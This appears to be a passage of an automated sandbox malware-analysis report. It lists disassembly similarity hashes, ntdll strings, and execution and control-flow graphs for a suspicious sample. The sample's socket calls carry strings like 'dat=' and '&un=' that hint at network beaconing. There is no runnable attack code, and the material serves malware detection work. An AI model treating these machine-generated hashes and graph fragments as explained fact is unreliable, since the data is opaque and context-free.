                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                                                                                    • Instruction ID: e72c6f19aeef7d8933df0ad8fb91423de18b97a173017f345df82b037d5451ca
                                                                                    • Opcode Fuzzy Hash: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                                                                                    • Instruction Fuzzy Hash: C95129B5B04257BFDB10DF9DA99097EF7F9BB08200B508129E866D7641D634EE108BE1
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05044725
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 05044787
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050446FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05044742
                                                                                    • ExecuteOptions, xrefs: 050446A0
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05044655
                                                                                    • Execute=1, xrefs: 05044713
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                                                                                    • Instruction ID: d697e3e8634286da4e2663622183a669e422efc6d08e9b65070cb7f688c7b9dc
                                                                                    • Opcode Fuzzy Hash: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                                                                                    • Instruction Fuzzy Hash: 91510771700209AAEF21DAA4BD99FFE77A9FB14340F4400A9E906A71C0DB75FA42CF51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: b0fecc9358e3ecbc1acc553e1f9a2aeb977c199a0dd0e250587de6a79009c1c0
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: B981E470E052499EDF24CF68E9507FEBBF2BF55710F184119EC91A7290CB348841C76A
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050402BD
                                                                                    • RTL: Re-Waiting, xrefs: 0504031E
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050402E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                                                                                    • Instruction ID: 881827ba31041282a861a6cff17087c5a02ad6e4962aa1d4b9e113a5c330c948
                                                                                    • Opcode Fuzzy Hash: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                                                                                    • Instruction Fuzzy Hash: 97E1F371608741DFD720CF28D898B2AB7E0BF88714F140A6EF6959B2E0D774E846CB52
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 05047B8E
                                                                                    • RTL: Re-Waiting, xrefs: 05047BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05047B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                                                                                    • Instruction ID: 5eeacd28b8b01fb6194a5048476e265a886964391f1756d83fc6ab00fa63418d
                                                                                    • Opcode Fuzzy Hash: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                                                                                    • Instruction Fuzzy Hash: 4341D1753047029FD720DE25E841B6EB7E6FF89720F000A2DF95A97681DB71E8068F91
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0504728C
                                                                                    Strings
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05047294
                                                                                    • RTL: Resource at %p, xrefs: 050472A3
                                                                                    • RTL: Re-Waiting, xrefs: 050472C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                                                                                    • Instruction ID: 4dcb94d992fc8107be8f276265f840280c0627bd36e69df255b0d40bb4895a9c
                                                                                    • Opcode Fuzzy Hash: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                                                                                    • Instruction Fuzzy Hash: 5041FFB1704202ABD721DE25ED41FAEB7E6FB94720F100629FC55AB280DB21F842CBD1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: 1138955c0db37542352ee46babec88a64cefa57370c47fa2944fa2c792f2fb28
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 7591C271E0420A9BDF64CE69E881ABFB7F6FF44360F14851AEC56E72C0D7309941875A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                                                                                    • Instruction ID: 0c04c3f69b0ec78f2c91bc310075ccc09c8ec31ea36fa6a376005840e36f3a60
                                                                                    • Opcode Fuzzy Hash: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                                                                                    • Instruction Fuzzy Hash: 2C812CB5D002699BDB31CF94CC45BEEB7B9AF08714F0441EAA909B7240D770AE85CFA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:29
                                                                                    Total number of Limit Nodes:4
                                                                                    execution_graph 13898 4cdf1a9 13900 4cdf1bb 13898->13900 13899 4cdf2a0 13900->13899 13902 4cde2c9 13900->13902 13903 4cde2e2 13902->13903 13905 4cde37a 13902->13905 13906 4d02129 13903->13906 13905->13900 13907 4d0218b 13906->13907 13909 4d021a8 13907->13909 13910 4cdfa19 13907->13910 13909->13905 13912 4cdfa67 13910->13912 13911 4cdfc68 13911->13909 13912->13911 13913 4cdff70 13912->13913 13916 4cdfe05 13912->13916 13914 4d04009 closesocket 13913->13914 13915 4cdff8a 13914->13915 13915->13909 13917 4cdff01 13916->13917 13927 4cdffb5 13916->13927 13918 4d04009 closesocket 13917->13918 13919 4cdff1b 13918->13919 13919->13909 13920 4ce0124 13921 4d04009 closesocket 13920->13921 13922 4ce0160 13921->13922 13922->13909 13924 4ce005f 13925 4ce01f4 setsockopt 13924->13925 13926 4ce0103 13924->13926 13925->13926 13928 4d04009 13926->13928 13927->13920 13927->13924 13929 4d04026 13928->13929 13930 4d04035 closesocket 13929->13930 13930->13911

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4cdfa19-4cdfa65 1 4cdfa67-4cdfa6a 0->1 2 4cdfa80-4cdfa82 0->2 1->2 3 4cdfa6c-4cdfa6f 1->3 4 4cdfa88-4cdfa8f 2->4 5 4ce02f6-4ce02fb 2->5 3->2 6 4cdfa71-4cdfa74 3->6 7 4cdfa95-4cdfaa6 4->7 8 4ce02f5 4->8 6->2 9 4cdfa76-4cdfa79 6->9 10 4cdfaa8-4cdfaae 7->10 11 4cdfab4-4cdfab7 7->11 8->5 9->2 12 4cdfa7b-4cdfa7e 9->12 10->11 13 4cdfabe 11->13 14 4cdfab9-4cdfabc 11->14 12->2 12->4 15 4cdfac4-4cdfacc 13->15 14->13 14->15 16 4cdfadc-4cdfadf 15->16 17 4cdface-4cdfad1 15->17 18 4cdfae7-4cdfafe 16->18 20 4cdfae1 16->20 17->18 19 4cdfad3-4cdfada 17->19 21 4cdfb05-4cdfb0c call 4cdf679 18->21 22 4cdfb00-4cdfb03 18->22 19->20 20->18 25 4cdfb11-4cdfb30 21->25 22->21 23 4cdfb36-4cdfb3c 22->23 26 4cdfbde-4cdfbeb 23->26 27 4cdfb42-4cdfb48 23->27 25->8 25->23 26->8 28 4cdfbf1-4cdfbf8 26->28 29 4cdfb4a-4cdfb6d call 4cdb769 call 4cfc069 27->29 30 4cdfb73-4cdfb82 27->30 32 4cdfbfa-4cdfc0b call 4d03e99 28->32 33 4cdfc12-4cdfc20 28->33 29->30 30->8 31 4cdfb88-4cdfb8c 30->31 31->8 37 4cdfb92-4cdfb94 31->37 32->33 35 4cdfc76-4cdfc95 33->35 36 4cdfc22-4cdfc3a call 4cdf7a9 33->36 42 4cdfc97-4cdfcb1 call 4d05a29 35->42 43 4cdfcb3-4cdfcb6 35->43 47 4cdfc3f-4cdfc66 36->47 37->8 44 4cdfb9a-4cdfb9c 37->44 55 4cdfcef-4cdfcf4 call 4d05a29 42->55 43->8 50 4cdfcbc-4cdfcbf 43->50 44->8 49 4cdfba2-4cdfbc1 call 4cdf709 44->49 47->35 51 4cdfc68-4cdfc75 47->51 56 4cdfbc6-4cdfbcb 49->56 50->8 54 4cdfcc5-4cdfcc8 50->54 57 4cdfccf-4cdfcee call 4d05a29 54->57 58 4cdfcca-4cdfccd 54->58 61 4cdfcf7-4cdfdb2 call 4d059f9 call 4ced949 call 4cee839 * 2 call 4d059f9 call 4d02709 call 4d05bf9 55->61 56->26 60 4cdfbcd-4cdfbd3 56->60 57->55 58->57 58->61 60->26 79 4cdfdcf-4cdfdf6 61->79 80 4cdfdb4-4cdfdb7 61->80 82 4cdfdfc-4cdfdff 79->82 83 4cdff46-4cdff6a call 4ce1469 79->83 80->79 81 4cdfdb9-4cdfdcc call 4ce0c99 80->81 81->79 82->83 86 4cdfe05-4cdfe28 82->86 91 4cdfec5-4cdfecb 83->91 92 4cdff70-4cdffb4 call 4d04009 83->92 89 4cdfe2e-4cdfec2 call 4d05d29 * 3 call 4d05bf9 * 2 call 4cee839 * 2 86->89 90 4cdfe2a 86->90 89->91 90->89 95 4ce010f-4ce0122 call 4d05bf9 91->95 96 4cdfed1-4cdfed4 91->96 105 4ce0124 95->105 106 4ce00b0-4ce00da call 4cdb329 call 4cdf839 95->106 96->95 100 4cdfeda-4cdfefb call 4ce1499 96->100 111 4cdffb5-4ce0039 call 4d05bf9 call 4d059f9 call 4d05bf9 call 4d02709 call 4d05bf9 * 3 100->111 112 4cdff01-4cdff45 call 4d04009 100->112 109 4ce0129-4ce017a call 4cdb329 call 4cfe019 call 4d04009 105->109 130 4ce017b 106->130 131 4ce00e0-4ce00f5 106->131 173 4ce003b-4ce0052 call 4d05bf9 call 4d059f9 111->173 174 4ce0055-4ce0059 111->174 136 4ce017e-4ce0181 130->136 131->130 134 4ce00fb-4ce0101 131->134 134->136 139 4ce0103 134->139 141 4ce0194-4ce01b1 136->141 142 4ce0183-4ce0186 136->142 149 4ce010a 139->149 145 4ce01c3-4ce0255 call 4d05a29 call 4d059f9 setsockopt call 4cdf8c9 141->145 146 4ce01b3-4ce01bd 141->146 143 4ce018c-4ce018e 142->143 144 4ce02ad-4ce02c2 call 4d04009 142->144 143->141 143->144 155 4ce02c7-4ce02eb 144->155 167 4ce0299-4ce02a7 145->167 168 4ce0257 145->168 146->144 146->145 149->144 155->8 167->144 168->167 170 4ce0259-4ce025e 168->170 170->167 172 4ce0260-4ce028d call 4cdf8c9 170->172 177 4ce0292-4ce0297 172->177 173->174 178 4ce005f-4ce006f 174->178 179 4ce0126 174->179 177->167 177->168 180 4ce008f-4ce0092 178->180 181 4ce0071-4ce0077 178->181 179->109 184 4ce0097-4ce009d 180->184 181->180 183 4ce0079-4ce008d 181->183 183->184 186 4ce009f-4ce00a5 184->186 187 4ce00ad 184->187 186->187 189 4ce00a7 186->189 187->106 189->187
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 04CE0222
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.4743693637.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_4cc0000_LiiDBuNLRIYu.jbxd
                                                                                    Similarity
                                                                                    • API ID: setsockopt
                                                                                    • String ID: &br=9$&un=$80$dat=
                                                                                    • API String ID: 3981526788-3709368510
                                                                                    • Opcode ID: 706fa655e954c4611db633b65ee223980f4897cd1107005bdeee329eeab4cf1e
                                                                                    • Instruction ID: ed3806390d5382f37425fb1853c6cc248041c7645a3486f881a8b089f2d806cb
                                                                                    • Opcode Fuzzy Hash: 706fa655e954c4611db633b65ee223980f4897cd1107005bdeee329eeab4cf1e
                                                                                    • Instruction Fuzzy Hash: F8429571A00205AFDB28DFA5D890BFEB3B6FF48304F14856DE61A9B241E770B545CBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 190 4d04009-4d04043 call 4cdb7b9 call 4d04c09 closesocket
                                                                                    APIs
                                                                                    • closesocket.WS2_32(04CE02C7,04D021A8,?,?,04CE02C7,?,000000FF), ref: 04D0403E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.4743693637.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_4cc0000_LiiDBuNLRIYu.jbxd
                                                                                    Similarity
                                                                                    • API ID: closesocket
                                                                                    • String ID:
                                                                                    • API String ID: 2781271927-0
                                                                                    • Opcode ID: eeecaf2e310d1f5b42629169f254ba9c9d46488a509d5f10f91667a84d8a84df
                                                                                    • Instruction ID: 49e8f3d7501295d753c841f2e917e1d68b6125f285b011533f3a068d3bf1a957
                                                                                    • Opcode Fuzzy Hash: eeecaf2e310d1f5b42629169f254ba9c9d46488a509d5f10f91667a84d8a84df
                                                                                    • Instruction Fuzzy Hash: 37E08C763006047BD210EAAADC40EAB776CDFC6310F014515FE0CA7241D671B90087F1